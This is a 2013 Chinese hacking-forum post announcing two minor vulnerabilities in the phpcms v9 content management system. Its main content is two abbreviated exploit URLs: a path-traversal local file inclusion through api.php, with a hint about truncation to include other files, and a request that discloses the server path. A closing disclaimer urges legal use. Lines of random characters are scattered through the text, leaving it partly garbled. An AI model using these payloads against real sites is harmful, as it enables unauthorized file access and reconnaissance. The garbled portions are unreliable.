找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2119|回复: 0
打印 上一主题 下一主题

phpcms v9两个鸡肋漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
2 r9 f& M) h6 o+ o' E( l( y3 w1 H# ]4 q8 D9 v
Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck
6 t0 C" g, O$ _' M. `2 Y- ?& U# G: S3 {1 B3 G
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。$ e! ?% A6 B9 d' F0 d$ ?
. \) b8 Y! J. T. `) C( Q# w3 {
Exp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy8 G8 ~" i; y% W/ g1 G

8 l% F( V* ~- k& x0 J#暴路径
1 r( r: j0 [  n+ L' E; N5 T" c9 i( o5 r, k( P+ x
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。  Y9 p" U% S' C4 }
1 ?( _1 o+ C) h% Y3 p2 K
# I0 L; D) p; z! z. s( N& ?

9 N! ^) o9 L5 b$ g+ e- L* d0 a+1
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表